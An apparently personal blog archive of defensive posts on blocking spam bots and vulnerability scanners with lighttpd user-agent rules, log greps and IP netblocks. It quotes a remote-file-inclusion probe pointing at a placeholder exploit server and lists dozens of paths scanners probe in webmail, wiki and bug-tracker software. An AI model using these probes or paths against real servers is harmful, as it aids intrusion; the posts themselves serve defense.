White listing User Agents to combat Spam Bots and Scrapers

Posted 2008-03-21 in Spam by Johann.

IncrediBill mentioned white listing user agents to block spam bots and other types of abusers. I then tried out white listing as opposed to black listing as I did before.

Here is a short explanation of the difference between black listing and white listing.

Black listing

Black listing means rejecting all requests that fit into a certain pattern.

Black listing looks like this in my web server configuration:

$HTTP["useragent"] =~ "(bad_bot|comment spammer|spambot 1)" {
 url.access-deny = ( "" )
}

This means that all user agent strings containing bad_bot, comment spammer or spambot 1 are served a 403 Forbidden error message.

White listing

White listing means rejecting all request that do not fit into a certain pattern.

White listing looks as follows in my configuration:

$HTTP["useragent"] !~ "^(Mozilla|Opera)" {
 url.access-deny ( "" )
}

This means that only user agent strings starting with Mozilla or Opera are allowed, everything else is served a 403 Forbidden error message.

The downside of white listing is that the number of allowed user agents can be very large. As an example, user agents of Motorola cell phones start with Motorola-, but some also start with MOT-, MOTOROKR or even motorazr.

Right now, I have more than 100 rules in my white list regular expression.

Which one is right for me?

I recommend using black lists if you cannot spend much time reading log files and changing your web server’s configuration. Black listing, combined with IP blocking of known abusers, can still be effective in limiting bandwidth theft.

Black listing, however, will not prepare you against future bad bots and reincarnations of Russian email harvester outfits. This is where white listing is better.

4 comments

Exploit and Vulnerability Scanners using libwww-perl

Posted 2008-08-21 in Spam by Johann.

One of the stranger things I see are the people scanning for vulnerable servers that always use the same libwww-perl user agent, like in this example:

… "GET /inc/irayofuncs.php?irayodirhack=http://<sploit server>/id??%0D?? HTTP/1.1" 403 4232 "-" "libwww-perl/5.805" "-"

These people definitely come around:

$ grep -c '"libwww-perl' <this week’s log>
111

And with the exception of the following outfit, all of the libwww-perl is used only for vulnerability scanning and exploiting of servers.

$ grep '"libwww-perl' <log> | grep -v http
96.244.75.34 … "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808" "-"
70.88.158.109 … "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808" "-"

Obviously, the first thing you should do is white listing user agents so that none of the libwww-perl dirt can slip through and your server is hacked.

Statistics

The next thing is to take a look at where this scanning is coming from. I am using the last half year of my log files here.

Requests

IP address/Hostname

Hosting

Description

113

216.118.81.182
(216.118.81.0/24)

Site5 hosting, Net Access Corporation, US

63

65.91.249.193
(65.88.0.0/14)

Level3, US

46

217.20.118.202
deltaesports.com
(217.20.112.0/20)

netdirekt e. K., DE

41

217.20.116.93
atlas.f2k-server.org
(217.20.112.0/20)

netdirekt e. K., DE

40

195.205.178.120
bip.erg-bierun.com.pl
(195.205.0.0/16)

Zaklady Tworzyw Sztucznych Erg-Bierun S.A., PL

Black listed on these mail blocklists.

35

80.253.99.164
reds.freshwebhosts.com
(80.253.96.0/19)

Commerical Collocation Ltd, UK

Black listed as well.

31

213.228.155.43
smol-srv01.netvisao.pt
(213.228.128.0/18)

Cabovisao SA, PT

29

38.117.65.239
(38.0.0.0/8)

Ravand CyberTech Inc, Performance Systems International Inc., US

27

87.230.77.168
johannes.jarolim.com
(87.230.0.0/17)

Hosteurope GmbH, DE

27

216.239.69.227
onnet1.onnet.ca
(216.239.64.0/19)

VIF Internet, CA

As you can see, the IP addresses are all over the place, geographically and what they’re used for. Also, for half a year, 113 requests isn’t much so each system either runs at a stealthy low scanning rate (unlikely) or the scanner processes are discovered sooner or later and the security holes are plugged (more likely).

I haven’t had one of my servers hacked but one thing I would like to find out if these computers are exploited beyond the vulnerability scanning.

Websense and how to Block Web Sense’s Constant Abuse

Posted 2008-08-26 in Spam by Johann.

Websense, Inc. is one of the busiest net abusers. Their stealth scanning never stops.

208.80.193.26 … "GET / HTTP/1.0" 403 4232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 3304; SV1; .NET CLR 1.1.4322)" "-"
208.80.193.37 … "GET /blog/music/ HTTP/1.0" 403 4232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Dealio Toolbar 3.1.1; Zango 10.0.370.0)" "-"

If you go through your own log files, you’ll notice that Websense never uses the same user agent twice (simply to never show up in statistics). Here’s how aggressive Websense is:

$ nice gunzip -c <five weeks of log files> | egrep -c '^208.80.19'
414

Over 400 requests in over a month make Websense a lot more aggressive than vulnerability scanners and forum scanners.

Primarily, the abuse is coming from 208.80.193.0/24.

$ nice gunzip -c <five weeks of log files> | egrep '^208.80.19' | awk '{print($1)}' | sort | uniq -c | sort -r -n
     35 208.80.193.31
     34 208.80.193.44
     33 208.80.193.33
     30 208.80.193.27
     25 208.80.193.37
     25 208.80.193.32
     22 208.80.193.46
     22 208.80.193.30
     21 208.80.193.35
     20 208.80.193.42
     19 208.80.193.45
     18 208.80.193.29
     16 208.80.193.39
     15 208.80.193.40
     14 208.80.193.48
     14 208.80.193.34
     12 208.80.193.47
     11 208.80.193.36
      6 208.80.193.41
      6 208.80.193.38
      5 208.80.193.26
      4 208.80.193.59
      4 208.80.193.50
      2 208.80.193.54
      1 208.80.193.43

Block Websense

Here are Web sense’s netblocks. Block all of them.

  • 66.194.6.0/24
  • 67.117.201.128
  • 91.194.158.0/23
  • 192.132.210.0/24
  • 204.15.64.0/21
  • 208.80.192.0/21

9 comments

“Toata dragostea mea pentru” Vulnerability Scanners

Posted 2009-01-16 in Spam by Johann.

I have many visits from people who are interested in vulnerability scanners, whether libwww-perl or the “Toata dragostea mea pentru diavola” scanners.

Requests

Here are all requests made by them. They did change user agents in the meantime to something cloaked – their latest one is

62.75.224.201 … "GET /roundcubemail-0.1/bin/msgimport HTTP/1.1" 403 4131 "-" "Toata dragostea mea pentru god    (god     is a girl and this is not a pbot or a browser)"

I wonder what they were smoking…

  • /bin/configure?action=image
  • /bin/msgimport
  • /bt/login_page.php
  • /bug/login_page.php
  • /bugs/login_page.php
  • /bugtrack/login_page.php
  • /bugtracker/login_page.php
  • /cgi-bin/configure?action=image
  • /cube/bin/msgimport
  • /domain_default_page/index.html
  • /email/program/js/list.js
  • /issue/login_page.php
  • /issuetracker/login_page.php
  • /login_page.php
  • /mail/bin/msgimport
  • /mail/program/js/list.js
  • /mail/roundcube/bin/msgimport
  • /mantis/login_page.php
  • /mantisbt/login_page.php
  • /msgimport
  • /portal/login_page.php
  • /program/js/list.js
  • /projects/login_page.php
  • /rc/bin/msgimport
  • /rc/program/js/list.js
  • /round/bin/msgimport
  • /roundcube-0.1/bin/msgimport
  • /roundcube//bin/msgimport
  • /roundcube/bin/msgimport
  • /roundcube/program/js/list.js
  • /roundcubemail-0.1/bin/msgimport
  • /roundcubemail-0.2/bin/msgimport
  • /roundcubemail/bin/msgimport
  • /roundcubemail/program/js/list.js
  • /roundcubewebmail/bin/msgimport
  • /support/login_page.php
  • /tag/configure?action=image
  • /tracker/login_page.php
  • /twiki/bin/configure?action=image
  • /vhcs/domain_default_page/index.html
  • /vhcs2/domain_default_page/index.html
  • /webmail/bin/msgimport
  • /webmail/program/js/list.js
  • /webmail/roundcube/bin/msgimport
  • /wiki/bin/configure?action=image
  • /wiki/cgi-bin/configure?action=image
  • /wiki/cgi/configure?action=image
  • /wikis/bin/configure?action=image
  • HTTP/1.1

The last line is not a mistake – their code just makes malformed HTTP requests. They also do not send any host headers with the requests. In other words, they do not have a list of domains they’re scanning, just IP addresses. Maybe not even that.

Targets

Just by going through the list of requests, we can see

  • webmail systems,
  • bug tracking software,
  • Wikis and
  • unspecified login pages.

Tips

How can you harden your web server against these attacks?

  • No default paths. Never install web applications in default paths suggested by installation instructions.
  • Remove footprints. Most web applications leave notes in the HTML. “Powered by WordPress” is a very common one. Make sure you remove the most obvious hints.
  • No default web sites. Make sure a host header is required. Try wget -d http://<your IP address>. You should not get your home page back.
  • Have a strategy for other types of web abuse. Spamtraps, the ability to block by IP netblock and user agent, firewalls.

11 comments

Pages

Page 1 · Page 2 · Page 3 · Page 4 · Next Page »

Subscribe

RSS 2.0, Atom or subscribe by Email.

Top Posts

  1. DynaCloud - a dynamic JavaScript tag/keyword cloud with jQuery
  2. 6 fast jQuery Tips: More basic Snippets
  3. xslt.js version 3.2 released
  4. xslt.js version 3.0 released XML XSLT now with jQuery plugin
  5. Forum Scanners - prevent forum abuse
  6. Automate JavaScript compression with YUI Compressor and /packer/

Navigation